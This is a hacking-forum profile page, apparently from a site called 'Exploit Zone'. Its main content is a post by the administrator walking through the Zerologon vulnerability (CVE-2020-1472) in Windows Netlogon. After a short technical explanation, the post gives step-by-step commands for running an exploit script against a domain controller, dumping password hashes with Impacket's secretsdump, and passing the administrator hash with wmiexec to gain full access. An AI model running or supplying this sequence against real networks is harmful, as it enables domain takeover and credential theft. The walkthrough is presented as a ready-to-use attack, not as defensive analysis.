Jump to content
Search In
  • More options...
Find results that contain...
Find results in...

Windows Server Netlogon Exploit Code Publicly Exposed

Windows Server Netlogon Exploit Code Publicly Exposed
Read more...

Evilnum hackers targeting financial firms with a new Python-based RAT

Evilnum hackers targeting financial firms with a new Python-based RAT
Read more...

Try challenges


Register & Join The Game

Break It

Welcome to Exploit Zone


Become a ninja in the shadow !

News
  • Welcome To Exploit Zone
  • The kingdom of knowledge sharing in hacking
  • New Updates ! Stay Tunned !
  • Share your knowledge here !
  • unlash your power on our challenges !
  • Become a ninja in the Shadow !

AdminSec

Administrators 
  • Content Count

    256
  • Joined

  • Last visited

  • Days Won

    58
  • Points

    227,479 [ Donate ]

Profile Song

AdminSec last won the day on October 25

AdminSec had the most liked content!

Community Reputation

103 Excellent

9 Followers

About AdminSec

  • Rank
    Developer by day, Ninja by night

Register Information

  • Birth date
    11/15/85
  • Experience in years
    10
  • Your ambitions
    Create the perfect community
  • Your Favorite domains
    Pentest

Recent Profile Visitors

23859 profile views
  1. AdminSec

    CVE-2020-1472

    Hello, Today i will show you the "Zerologon" exploit ! CVE-2020-1472 is a privilege escalation vulnerability due to the insecure usage of AES-CFB8 encryption for Netlogon sessions. The AES-CFB8 standard requires that each byte of plaintext, like a password, must have a randomized initialization vector (IV) so that passwords can’t be guessed. The ComputeNetlogonCredential function in Netlogon sets the IV to a fixed 16 bits, which means an attacker could control the deciphered text. An attacker can exploit this flaw to impersonate the identity of any machine on a network when attempting to authenticate to the Domain Controller (DC). Further attacks are then possible, including the complete takeover of a Windows domain. Secura’s whitepaper also notes that an attacker would be able to simply run Impacket’s ‘secretsdump’ script to pull a list of user hashes from a target DC. In order to exploit this vulnerability, the attacker would need to launch the attack from a machine on the same Local Area Network (LAN) as their target. A vulnerable client or DC exposed to the internet is not exploitable by itself. The attack requires that the spoofed login works like a normal domain login attempt. Active Directory (AD) would need to recognize the connecting client as being within its logical topology, which external addresses wouldn’t have. First Step : Download Impacket : git clone [Hidden Content] Download ZeroLogon Exploit : git clone [Hidden Content] Step to compromise the DC cd impacket pip3 install . cd ../cve-2020-1472 python3 cve-2020-1472.py <DCNAME> <IPAddress> After what you can see this result You can now connect on the DC but before take the hash ! cd ../impacket/examples/ python3 secretdump.py -just-dc -no-pass '<DOMAIN/DCNAME@IP.AD.DR.ESS' After that you have the Hash of the administrator You can use it to open session on the DC with wmiexec ! wmiexec.py -hashes <:yourhash> '<DOMAIN/DCNAME@IP.AD.DR.ESS' You have now a full access ! 🙂
  2. Windows Server Netlogon Exploit Code Publicly Exposed
  3. Bonjour, Ont pourrait avoir plus de contexte sur le challenges ?
  4. AdminSec

  5. Hello, The most of the time just an update can correct this, plug your rj45 and update
  6. Researchers Uncover Novel Way to De-anonymize Device IDs to Users' Biometrics
  7. AdminSec

  8. AdminSec

  9. AdminSec

  10. AdminSec

  11. AdminSec

×
×
  • Create New...